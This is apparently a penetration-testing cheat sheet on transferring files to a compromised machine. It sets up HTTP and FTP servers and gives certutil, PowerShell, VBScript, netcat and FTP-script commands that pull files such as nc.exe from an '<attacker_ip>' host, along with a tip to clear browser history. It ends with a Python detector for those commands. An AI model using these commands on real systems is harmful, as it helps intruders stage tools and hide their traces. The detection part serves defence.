💡Tip: During lateral movement - if a compromised machine is already running a web server, copy the files over to the HTTP folder.
Python
Set up an HTTP server on the attacker machine within a specific (/root) directory.
The method uses the Python module SimpleHTTPServer, and has two minor downsides:
When you Ctrl+C to stop the server, it gives you a mess of errors, and
This isn’t the shortest command to set up an HTTP server.
The main advantage of the python3 version is that we don’t get a mess of errors after stopping the server.
Apache
This is a longer method of setting up an HTTP server; it can be used in case Python or the respective modules are not available.
Move all the transfer files to the /var/www/html directory, and
Start the Apache2 service: `service apache2 start`
We can verify the server is running and serving the files by browsing our files via a web browser.
FTP
Python pyftpdlib:
Ensure the module is installed: `sudo apt-get install python-pyftpdlib`
Set up & run the FTP server (default port - 2121): `python -m pyftpdlib [-p port]`
Pure-ftpd:
Ensure the package is installed: `sudo apt-get install pure-ftpd`
Set up and run the FTP server: `service pure-ftpd start`
Verify the service is running: `service pure-ftpd status`
Shut down the service: `service pure-ftpd stop`
💡Tip: Remote GUI access - use a browser to retrieve the file (clear the download & browser history).
CMD & PowerShell
Certutil: `certutil -urlcache -split -f http://<attacker_ip>:<port>/file_to_download.ext [output_file.ext]`
PowerShell - Installed in Windows 7 and Server 2008+; use single quotes for the URL and out_file.ext (double quotes will not work):
`powershell -c (New-Object Net.WebClient).DownloadFile('http://<attacker_ip>:<port>/file_to_download.ext', 'output_file.ext')`
`powershell.exe -c (Start-BitsTransfer -Source "http://<attacker_ip>:<port>/file_to_download.ext" -Destination C:\temp\nc.exe)`
`powershell.exe wget "http://<attacker_ip>:<port>/file_to_download.ext" -outfile "c:\temp\nc.exe"`
VBScript
Create and save the following VBScript and execute this command:
`cscript wget.vbs http://<attacker_ip>:<port>/file_to_download.ext`
Netcat
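Netcat can also be used to manually download files from an HTTP server: direct the download output to a file and use sed to delete the first 7 lines of the file (the HTTP GET response header). The request has to end with a blank line, and nc takes the host and port as separate arguments. The number of header lines depends on the server, so check the count before deleting.
`printf 'GET /file HTTP/1.0\r\n\r\n' | nc -n <attacker_ip> <port> > out-file && sed -i '1,7d' out-file`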
FTP Hosting
Create a file (ftp.txt) with all the FTP commands required and run them all at once:
Create a connection to the attacker FTP server.
Specify the username & password
Enable binary transfer mode for executable files (optional)
GET the executable file, and
Close the connection
Execute the file (on Windows target machine): `ftp -v -n -s:ftp.txt`
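From the defender's side, each Windows download command listed above appears as a process command line when command-line logging is enabled. The following is an added example, not part of the original page: a small Python matcher for those command forms, run over constructed sample log entries. The rule names, host names and the 192.0.2.10 address are assumptions made for the illustration.

```python
import re

# Patterns derived from the command forms listed on this page. The rule names
# are labels chosen for this example, not identifiers from any product.
RULES = {
    "certutil_urlcache": re.compile(
        r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*https?://", re.I),
    "ps_webclient_downloadfile": re.compile(
        r"\bpowershell(\.exe)?\b.*net\.webclient.*downloadfile", re.I),
    "ps_bitstransfer": re.compile(
        r"\bpowershell(\.exe)?\b.*start-bitstransfer\b.*https?://", re.I),
    "ps_wget_outfile": re.compile(
        r"\bpowershell(\.exe)?\b.*\b(wget|iwr|curl|invoke-webrequest)\b.*-outfile\b", re.I),
    "cscript_url_arg": re.compile(
        r"\bcscript(\.exe)?\b.*\.vbs\b.*https?://", re.I),
    "ftp_script_file": re.compile(r"\bftp(\.exe)?\b.*\s-s:\S+", re.I),
}

# Constructed sample data: (host, command line) pairs, two of them benign.
SAMPLE_EVENTS = [
    ("WS01", "certutil -urlcache -split -f http://192.0.2.10:8000/a.ext out.ext"),
    ("WS01", r"certutil -hashfile C:\temp\setup.msi SHA256"),
    ("WS02", "powershell -c (New-Object Net.WebClient).DownloadFile("
             "'http://192.0.2.10:8000/a.ext', 'a.ext')"),
    ("WS02", 'powershell.exe -c (Start-BitsTransfer -Source '
             r'"http://192.0.2.10:8000/a.ext" -Destination C:\temp\a.ext)'),
    ("WS03", r'powershell.exe wget "http://192.0.2.10:8000/a.ext" -outfile "c:\temp\a.ext"'),
    ("WS03", "cscript wget.vbs http://192.0.2.10:8000/a.ext"),
    ("WS04", "ftp -v -n -s:ftp.txt"),
    ("WS04", r"powershell.exe Get-ChildItem C:\temp"),
]

def classify(command_line):
    """Return the sorted names of every rule that matches one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(command_line))

def scan(events):
    """Return (host, rule names) for each event that matches at least one rule."""
    findings = []
    for host, command_line in events:
        hits = classify(command_line)
        if hits:
            findings.append((host, hits))
    return findings

if __name__ == "__main__":
    for host, hits in scan(SAMPLE_EVENTS):
        print(host, ", ".join(hits))
```

Administrators also use BITS and Invoke-WebRequest legitimately, so a match is a triage signal to correlate with the parent process and destination rather than a verdict.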